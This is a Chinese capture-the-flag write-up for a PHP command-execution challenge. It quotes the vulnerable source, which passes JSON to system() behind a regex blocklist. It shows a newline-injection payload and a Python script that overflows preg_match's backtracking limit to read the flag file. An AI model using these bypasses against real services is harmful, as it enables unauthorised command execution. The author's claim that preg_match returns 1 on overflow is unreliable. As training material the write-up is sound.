知识点:调用cat命令在/bin/cat下 ,json格式,换行染过正则。数据溢出绕过正则。
题目让我门输入 JSON格式。根据题目是RCE,所以输入下{“cmd”:"ls"}查看一下当前目录下的文件 注意:json是 以键值对的形式存在的。
回显。index.php
cat 查看一下index。php内容:
被过滤掉了 。没有思路了 ,看一下别人wp
看到别人的找到的源代码
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
发现他的正则匹配 是以 .*来匹配变量json(也就是我们输入的值)的前后结束。那么我们可以使用%0a来进行绕过。
flag存在/home/rceservice/目录下
putenv('PATH=/home/rceservice/jail');// 设置了环境变量,只能使用当前环境的命令
既然有环境限制,那么我们想要查看 flag 必须使用cat ,则 /bin/cat调用cat命令。构造pyload:
{%0a"cmd":"/bin/cat%20/home/rceservice/flag"%0a}
得到flag。
还有一种方法,就是用preg_match的回溯限制,长度为一百万,来绕过preg_match,因为当preg_match匹配的字符串太长的时候就会返回1,也就是数据溢出(不知道理解对不对)。
构造pyload:
import requests
url = 'http://879f19e5-f850-4bf5-a4fb-bea23ce10945.node4.buuoj.cn:81/'
payload = {
'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","succ3":"'+'a'*1000000+'"}'
}
r = requests.post(url=url,data=payload)
print(r.text)
get传参是由长度限制,各个浏览器都不同,但肯定没有一百万,所以我们要用post提交
关于这块内容可以看:超回溯上限绕过